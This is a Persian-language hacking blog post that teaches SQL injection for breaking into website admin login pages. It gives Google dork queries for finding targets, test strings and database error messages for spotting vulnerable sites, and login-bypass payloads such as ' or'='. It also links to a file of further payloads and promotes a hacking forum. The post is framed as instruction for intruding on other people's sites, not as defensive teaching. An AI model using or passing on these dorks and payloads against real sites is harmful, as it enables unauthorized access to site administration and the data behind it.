سلام به همه بازدیدکنندگان محترم وبلاگ:

از این که دیرآپدیت کرده ام از شما عزیزان عذر خواهی می کنم  در این پست آموزش SQL Injection کردن را به شما می گویم در این روش من سعی می کنم به طور کاملا حرفه ای SQL Injection کردن را به شما آموزش بدهم

هکرهای نیمه حرفه ای گاهی برای این که بتوانند از راه دور به سایت هایی که صفحه ورود مدیر دارند وارد شوند از حملاتی به نام SQL Injection استفاده کرده و به این روش کدهایی را در پایگاه داده SQL یک سرور وارد می کنند که این کدها باعث اختلال در برنامه شده و هکر به صفحه اصلی مدیریت سایت وارد می شود و می تواند کارهای مختلفی انجام دهد اگر پست قبلی مرا خوانده باشید به شما گفتم که به وسیله یک اکسپلویت می توانید وبلاگ ها را هک کنید و چون SQL Injection را آموزش نداده بودم امکان داشت برای افراد تازه کار سوالات پیش آید

آموزش SQL Injection کردن:

اگر شما به یک سایت بروید در واقع به پورت 80 آن سایت وصل شده اید به همین دلیل هنگامی که وارد صفحه ورود مدیر می شود در واقع در واقع به صورت کاملا تصادفی فایروال آن سرور را رد کرده اید زیرا اکثر فایروال ها برای پورت 80 ممنوعیت خاصی قایل نمی شوند برای این که بتوانید وارد صفخه ورود شوید در گوگل واژه های زیر را Search کنید:

Inurl:/admin.asp

Inurl:/admin.asp "Powered by My SQL"

Inurl:/admin.asp "Powered by MSSQL"

البته همه سایت هایی را که به این روش پیدا می کنید را نمی توانید هک کنید زیرا یا ورژن جدید هستند یا برنامه بالا است و باید بر روی هر صفحه تست بکنید که این قابلیت را دارد یا خیر برای این کار می توانید از کاراکترهای ویژه مثل *"; استفاده بکنید برای مثال در قسمت Username و Password کارکترهای زیر را بنویسید:

Username:'user

Password:'pas

البته همیشه از یک کارکتر خاص استفاده نکنید و مثل زیر عمل کنید

Username:"*%user

Password:'%;pas

اگر این کدها را وارد کردید و به Error های زیر بر خورد کردید سایت آسیب پذیر می باشد:

The page cannot be displayed

There is a problem with the page you are trying to reach and it cannot be displayed.

ALL ODBC Error Messages

Microsoft OLE DB Provider for ODBC drivers error

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.

/verify .asp, line .

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft] [ODBC SQL Server] Unclosed quotation mark before the

character string

Microsoft OLE DB Provider for ODBC Drivers error '80004005 '

[Microsoft][ODBC Microsoft Access Driver]

Microsoft JET Database Engine error '80040e14 '

با این روش شما می توانید سایت های که قابل هک شدن هستن را هک کنید و وارد صفحه اصلی مدیر شوید برای این کار شما باید در قسمت Username و Password کدهای زیر را بنویسید:

Username:admin

Password:' or'=*

Username:admin " or "a"="a

Password:' or'='

به این ترتیب وارد صفخه مدیر می شوید بعضی مواقع شما باید کدها را با هم وارد کرده و گاهی یک به یک کدها را بنویسید شما می توانید کدهای کامل برای حملات SQL Injection کردن را از لینک زیر دریافت نمایید

http://www.siahacker.persiangig.com/SQLInjection.txt

به دوستانی که علاقه به هک دارند پیشنهاد می کنم که در سایت www.ashiyane.net  عضو شده و از مقالات و آموزش های تصویری که توسط اعضا و مدیران تهیه می شود استفاده کنند